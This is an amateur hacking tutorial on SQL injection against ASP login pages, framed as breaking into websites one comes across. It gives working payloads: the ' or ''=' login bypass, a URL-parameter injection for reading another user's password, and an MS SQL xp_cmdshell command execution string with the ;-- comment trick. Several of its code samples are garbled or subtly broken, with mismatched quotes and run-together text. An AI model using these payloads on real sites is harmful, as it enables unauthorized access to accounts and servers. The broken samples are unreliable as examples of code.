By: DangerDuo - doma111@yahoo.com

Preface 
Welcome to Part II of our paper on When Code goes wrong. This paper will explain about one of the most common input validation attack known as SQL Injection. This topic should be much easier to understand than the stack base exploit. Our example today would be on ASP. So basic ASP and SQL scripting knowledge equire.

Lets Begin
Okay, so we come across a website but it ask for a username and password. An example would be Porn site :) So you check that the page is an .asp page (Active Server Page) or some kind of server-side scripting language. Imagine the code behind the login page would be like this:

excluding all the database connection, only the sqlstring we care about:

login.aspSELECT * FROM account WHERE username = "' & request.form("username") & '" AND password = "'& request.form("password")'",conn

Obviously we have no idea what is the username and password. But this code already has a vulernablity. It is possible for us to add additional SQL statement to it to give us a different results. Normally we would enter for example:

Username: JasonPassword: honky

so the SQL statement would look like:

SELECT * FROM account WHERE username = 'Jason' AND password = 'honky', conn

But what if we enter

username : ' or ''='password : ' or ''='

so it becomes:

SELECT * FROM account WHERE username = '' or''='' AND password = '' or ''='', conn |------| |-------| Replaced Replaced

As you can see, we make username and password point to nothing. Since they can't find an empty username or password, they'll hit the "or" command. Since ''='' which returns 1, you'll get access to the protected site with the first account in the database.

This is the most basic idea of SQL injection. Imagine we encounter this: http://www.honky.com/list.asp?page=1

Imagine that the database table contain both the page and also account. (Seriously this doesn't occur, but for example)

SELECT * FROM table WHERE page="&id, conn

so if id = 1, it give pagename where id = 1. Imagine the table has these fields. 

username:password:http://www.honky.com/list.asp?page=0 OR username=honky

in this example, we have to bruteforce the username this isn't a login page. But through the above line, if sucessful, we can see the password of the username=honky. In MS SQL, we can do the following

'; exec master..xp_cmdshell 'ping'

this would run the ping command or if you want to get rid of all the sql statement after your injection, ;-- would ignore anything after that.

Ending
I think thats about it... This is the basic idea... I am sorry this article is extremely cheap... Here are some reference you can look at to expand your knowledge on sql injection

http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.nextgenss.com/papers/advanced_sql_injection.pdf
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf